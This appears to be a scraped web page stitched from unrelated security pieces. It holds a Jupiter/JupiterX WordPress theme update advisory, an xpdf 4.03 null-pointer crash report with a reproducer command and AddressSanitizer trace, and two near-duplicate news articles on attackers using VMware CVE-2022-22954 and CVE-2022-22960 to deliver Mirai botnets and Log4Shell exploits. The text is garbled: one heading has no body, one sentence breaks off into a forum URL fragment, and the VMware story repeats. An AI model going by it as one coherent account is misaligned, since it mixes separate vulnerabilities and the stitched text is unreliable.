If you are running the Jupiter Theme version 6.10.1 or below, you should immediately update to version 6.10.2 or higher.

If you are running the JupiterX Theme version 2.0.6 or below, you should immediately update to version 2.0.7 or higher.

If you are running the JupiterX Core Plugin version 2.0.7 or below, you should immediately update it to version 2.0.8 or higher.

If you know anyone using the Jupiter theme or the JupiterX theme, we urge you to forward this advisory to them as the most severe vulnerability allows complete site takeover.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Jupiter / JupiterX Theme Privilege Escalation / LFI / DoS / Access Control Issues

There is a Null Pointer Dereference vulnerability in the XFAScanner::scanNode() function in XFAScanner.cc in xpdf 4.03.

A NULL pointer dereference in the GString::getCString function in GString.h in xpdf-4.03 dirrerent viewtopic.php?f=3&t=41241&p=41808&hilit ... ing#p41808.

Code: Select all

    
    ./pdftops 'null_point.pdf'
    
    
    Syntax Error (92917): Command token too long
    Syntax Error (93045): Command token too long
    Syntax Error (93173): Command token too long
    Syntax Error: Couldn't read xref table
    Syntax Warning: PDF file is damaged - attempting to reconstruct xref table...
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==15006==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x55780e688f11 bp 0x7fff1cac0d50 sp 0x7fff1cac0d40 T0)
    ==15006==The signal is caused by a READ memory access.
    ==15006==Hint: address points to the zero page.
        #0 0x55780e688f10 in GString::getCString() /home/luna/test/xpdf/xpdf-4.03/goo/GString.h:83
        #1 0x55780e669d32 in XFAScanner::getFieldValue(ZxElement*, GString*, GString*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:349
        #2 0x55780e669bd1 in XFAScanner::scanField(ZxElement*, GString*, GString*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:333
        #3 0x55780e6698a7 in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:296
        #4 0x55780e669a1c in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:309
        #5 0x55780e669a1c in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:309
        #6 0x55780e669a1c in XFAScanner::scanNode(ZxElement*, GString*, GString*, GHash*, GHash*, GString*, ZxElement*, GHash*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:309
        #7 0x55780e66849f in XFAScanner::load(Object*) /home/luna/test/xpdf/xpdf-4.03/xpdf/XFAScanner.cc:139
        #8 0x55780e4ce1d9 in AcroForm::load(PDFDoc*, Catalog*, Object*) /home/luna/test/xpdf/xpdf-4.03/xpdf/AcroForm.cc:352
        #9 0x55780e4f034d in Catalog::Catalog(PDFDoc*) /home/luna/test/xpdf/xpdf-4.03/xpdf/Catalog.cc:234
        #10 0x55780e6276a4 in PDFDoc::setup2(GString*, GString*, int) /home/luna/test/xpdf/xpdf-4.03/xpdf/PDFDoc.cc:318
        #11 0x55780e627268 in PDFDoc::setup(GString*, GString*) /home/luna/test/xpdf/xpdf-4.03/xpdf/PDFDoc.cc:276
        #12 0x55780e626c5d in PDFDoc::PDFDoc(char*, GString*, GString*, PDFCore*) /home/luna/test/xpdf/xpdf-4.03/xpdf/PDFDoc.cc:218
        #13 0x55780e4cd7fa in main /home/luna/test/xpdf/xpdf-4.03/xpdf/pdftops.cc:309
        #14 0x7f7fae9130b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #15 0x55780e49106d in _start (/home/luna/test/xpdf/xpdf-4.03/build/xpdf/pdftops+0x14106d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/luna/test/xpdf/xpdf-4.03/goo/GString.h:83 in GString::getCString()
    ==15006==ABORTING

CVE-2021-27548: xpdf 4.03 bug in pdftops

Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.

Researchers say a GitHub proof-of-concept exploitation of recently announced VMware bugs is being abused by hackers in the wild.

Recently reported VMware bugs are being used by hackers who are focused on using them to deliver Mirai denial-of-service malware and exploit the Log4Shell vulnerability.

Security researchers at Barracuda discovered that attempts were made to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960, both reported last month.

“Barracuda researchers analyzed the attacks and payloads detected by Barracuda systems between April to May and found a steady stream of attempts to exploit two recently uncovered VMware vulnerabilities: CVE-2022-22954 and CVE-2022-22960” reported by Barracuda.

VMware published an advisory on April 6, 2022, which detailed multiple security vulnerabilities. The most severe of these is CVE-2022-22954 with a CVSS score of 9.8, the bug allows an attacker with network access to perform remote code execution via server-side template injection on VMware Workspace ONE Access and Identity Manager Solutions.

The other bug involved CVE-2022-22960 (CVSS score 7.8), is a local privilege escalation vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. According to the advisory by VMware, the bug arises due to improper permission in support scripts allowing an attacker with local access to gain root privileges.

The VMware Workspace One is an intelligent-drive workspace platform that helps to manage any app on any device in a secure and simpler manner. The Identity manager handles the authentication to the platform and vRealize Automation is a DevOps-based infrastructure management platform for config of IT resources and automating the delivery of container-based applications.

****Exploitation Occurred After PoC Release****

The Barracuda researchers noted that the previous flaws are chained together for a potential full exploitation vector.

After the bug was disclosed by VMware in April, a proof-of-concept (PoC) was released on Github and shared via Twitter.

“Barracuda researchers started seeing probes and exploit attempts for this vulnerability soon after the release of the advisory and the initial release of the proof of concept on GitHub,” reported Barracuda.

After the release of PoC, the spike in attempts is noticed by the researcher, they classified it as a probe rather than actual attempts to exploit.

“The attacks have been consistent over time, barring a few spikes, and the vast majority of them are what would be classified as probes rather than actual exploit attempts,” they added.

The researchers at Barracuda also revealed that most of the exploit attempts are primarily from botnet operators, the IPs discovered still seem to host variants of the Mirai distributed-denial-of-service (DDoS) botnet malware, along with some Log4Shell exploits and low levels of EnemyBot (a type of DDoS botnet) attempts.

The majority of the attacks (76 percent) originated from the U.S. geographically, with most of them coming from data centers and cloud providers. The researcher added that there is a spike in IP addresses from the UK and Russia and about (6 percent) of the attacks emanate from these locations.

The researchers noted, “there are also consistent background attempts from known bad IPs in Russia.”

“Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes,” researchers explained

According to Barracuda “the interest levels on these vulnerabilities have stabilized” after the initial spike in April, the researcher expected to analyze low-level scanning and attempts for some time.

The best way to protect the systems is to apply the patches immediately, especially if the system is internet-facing, and to place a Web application firewall (WAF) in front of such systems “will add to defense in depth against zero-day attacks and other vulnerabilities, including Log4Shell,” advised by Barracuda.

April VMware Bugs Abused to Deliver Mirai Malware, Exploit Log4Shell

A critical VMware bug tracked as CVE-2022-22954 continues to draw cybercriminal moths to its remote code-execution flame, with recent attacks focused on botnets and Log4Shell.

Recently uncovered VMware vulnerabilities continue to anchor an ongoing wave of cyberattacks bent on dropping various payloads. In the latest spate of activity, nefarious types are going in with the ultimate goal of infecting targets with various botnets or establishing a backdoor via Log4Shell.

That's according to Barracuda researchers, who found that attackers are particularly probing for the critical vulnerability tracked as CVE-2022-22954 in droves, with swaths of actual exploitation attempts in the mix as well.

The security vulnerability carries a CVSS score of 9.8 and affects the VMware Workspace ONE Access and Identity Manager. Workspace ONE is VMware's platform for delivering corporate applications to any device (a sort of juiced-up mobile device management solution), and the identity manager handles authentication to the platform. The bug allows remote code execution (RCE) via server-side template injection for attackers that have network access.

"A server-side template-injection issue may allow an unauthenticated user with access to the Web interface to execute any arbitrary shell command as the VMware user," Mike Goldgof, Barracuda's senior director of product marketing for data protection, network, and application security, tells Dark Reading. "In effect, a hacker can bring down the system, extract data, inject ransomware, etc."

"Cybercriminals are constantly scanning for these types of advisories and jump on them ASAP to attempt to exploit targets before they get a chance to download a patch," Goldgof noted. "\[And\] VMware infrastructure is widely deployed in both data center and cloud environments, providing a large population of attractive hacking targets." 

The activity sometimes involves a second bug (CVE-2022-22960, CVSS score of 7.8), which is a local privilege escalation (LPE) vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation (a platform for creating private clouds). The bug arises because of improper permissions in support scripts, according to VMware's advisory, and could allow attackers with local access to achieve root privileges. 

In this case, it's being chained with the previous flaw for a full exploitation vector, Barracuda noted.

VMware disclosed the bugs in April, and soon thereafter, a proof-of-concept (PoC) exploit was released on GitHub and tweeted out to the world. Unsurprisingly, researchers from multiple security firms started seeing probes and exploit attempts very soon thereafter — and the hits just keep coming. 

"Any serious vulnerability in a broadly used platform or application is cause for concern. Threat actors are always looking for an opportunity to hit multiple targets with minimal effort," Mike Parkin, senior technical engineer at Vulcan Cyber, tells Dark Reading. "VMware is one of the most popular virtualization platforms around, and often runs on powerful iron with multiple applications running on top of it. This gives an attacker multiple reasons to go after VMware servers."

**VMware Payloads du Jour**  
Barracuda researchers noticed that most of the probing in its telemetry now is for the VMware RCE vulnerability, using the PoC code from GitHub. Most of the actual exploit attempts meanwhile are now primarily from botnet operators, especially IPs hosting variants of the Mirai distributed denial-of-service (DDoS) botnet malware, along with a few EnemyBot samples (another DDoS baddie).

Otherwise, "some Log4Shell exploit attempts were also seen in the data," researchers noted.

As for who's behind the attacks, most originate in the US (76%), mostly emanating from data centers and cloud providers. However, the researchers also found "consistent background attempts" from Russian IP addresses that are well known to be affiliated with opportunistic cybercrime cartels.

"Some of these IPs perform scans for specific vulnerabilities at regular intervals, and it looks like the VMware vulnerabilities have been added to their usual rotating list of Laravel/Drupal/PHP probes," the researchers explained.

In April, another set of attacks was flagged, with a very different aim. An Iranian cyber-espionage group known as Rocket Kitten was seen exploiting the CVE-2022-22954 RCE to deliver the Core Impact penetration testing tool on vulnerable systems. And in another batch of April activity, cryptominers reportedly made their way into the exploitation-palooza lineup.

After several initial spikes in April, the interest levels in triggering these vulnerabilities have been holding steady, according to Barracuda, and the firm expects the scanning and exploitation attempts to continue for some time.

The best defense against this spate of attacks (and most botnet and Log4Shell activity) is Security 101 — i.e., patching. Defenders can also build in an extra layer of protection with a Web application firewall (WAF), adding "defense in depth against zero-day attacks and other vulnerabilities," according to Barracuda's Tuesday writeup.

It's important for companies to hop on patches for popular platforms as soon as vendor disclosures come out, Goldgof notes.

"Cybercriminals are constantly scanning for these types of advisories and jump on them ASAP to attempt to exploit targets before they get a chance to download a patch," he says. "\[And\] VMware infrastructure is widely deployed in both data center and cloud environments, providing a large population of attractive hacking targets."

Tag

#php